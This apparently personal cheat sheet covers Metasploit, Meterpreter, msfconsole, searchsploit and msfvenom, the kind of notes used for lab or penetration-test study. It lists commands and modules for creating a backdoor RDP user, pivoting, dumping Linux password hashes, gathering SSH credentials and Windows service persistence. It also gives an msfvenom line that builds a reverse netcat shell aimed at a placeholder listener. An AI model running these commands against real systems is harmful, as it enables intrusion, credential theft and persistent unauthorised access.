Metasploit Framework

Meterpreter

Meterpreter is a translation layer built into the Metasploit Framework console. It allows you to interact from your OS's shell with another OS's shell while being able to translate appropriately

Some handy commands:

import module - allows meterpreter to import a module, like powershell

load sourcefile destinationfile - allows meterpreter to load a file onto the target machine from the local machine

(PERSISTENCE) run getgui -e -u username -p password - Meterpreter script to enable RDP and create a user with a password

(PIVOTING) run autoroute -s 192.168.0.0/24 - Meterpreter script to add a route from attacker to target IP/subnet. Use run autoroute -p to view autoroutes

IN MSFCONSOLE: sessions -u sessionid - upgrades a session to a meterpreter shell (This will always use the same port, so if you need to upgrade multiple sessions, consider using multi/manage/shell_to_meterpreter">

Msfconsole

Msfconsole is a CLI tool that can be used to interact with Metasploit

Usage:

1. msfconsole - starts the console
2. search term to search - searches database for exploits/payloads
   • You can even use terms in your search. Such as type:exploit to search specifically for exploits
3. use # - selects exploit based on corresponding number
4. show payloads - lists available payloads for selected exploit
5. use # - selects payload
6. show options - lists available options for exploit and payload
7. set OPTION value - sets an option
8. exploit or run - runs the selected exploit

Some important things to note:

• Creating a workspace can be helpful to organize your work, to create a new workspace, type workspace -a workspacename and to interact with a workspace type workspace workspacename
• Sessions are often created when a shell is opened from an exploit, type sessions to list all sessions, and sessions -i sessionid to interact with a session. You can upgrade a session to a meterpreter shell with sessions -u sessionid
• Your payload is typically OS-dependant, meaning that a 64-bit Windows payload must be used for a 64-bit Windows target, and so on. Similarly, your multi/handler payload will (usually) have to match your generated payload
• A stageless payload is usually much larger than a staged payload, exploits may have a limit to the size of a payload
• Sometimes jobs can get stuck and cause conflictions with ports or re-running commands. Type jobs to list all jobs and jobs -k jobid to kill a job
db_nmap - NMAP with database saving
1. Ensure that the postgresql database is running (systemctl start postgresql)
2. Ensure that the metasploit database is running (msfdb init)
3. Set up a workspace to save and organize your data (workspace -a workspacename)
4. Use db_nmap OTHER_NORMAL_NMAP_OPTIONS to run NMAP
5. After you have used a db_nmap command, you can view information about your scan(s) with several commands
   • hosts - list all hosts in the database
   • services - list all services in the database

Some useful payloads/exploits:

• UAC bypass
• Eternal Blue
• linux/samba/is_known_pipename - SAMBA login
• post/multi/gather/ssh_creds - Gather SSH credentials
• post/linux/gather/hashdump - Linux unshadow hashdump
• (PERSISTENCE) exploit/windows/local/persistence_service - Windows service persistence
• exploit/windows/smb/psexec - Windows SMB psexec
• /windows/x64/meterpreter_reverse_tcp - 64-bit reverse TCP shell

Searchsploit

Searchsploit is a CLI tool that can be used to search for exploits

Usage:

searchsploit term - searches database for exploits

You can also download a script that searchsploit recommends based on your search term by typing searchsploit -m 123456 (replace 123456 with the ID listed in the "Path" section)

Msfvenom

Msfvenom is a CLI tool that can be used to create executable payloads

Usage:

msfvenom -p cmd/unix/reverse_netcat LHOST=LOCALMACHINE LPORT=4444 -f filetype R > output

Example:

-p: specifies payload

-lhost: specifies listening host

-lport: specifies listening port

-R: specifies raw format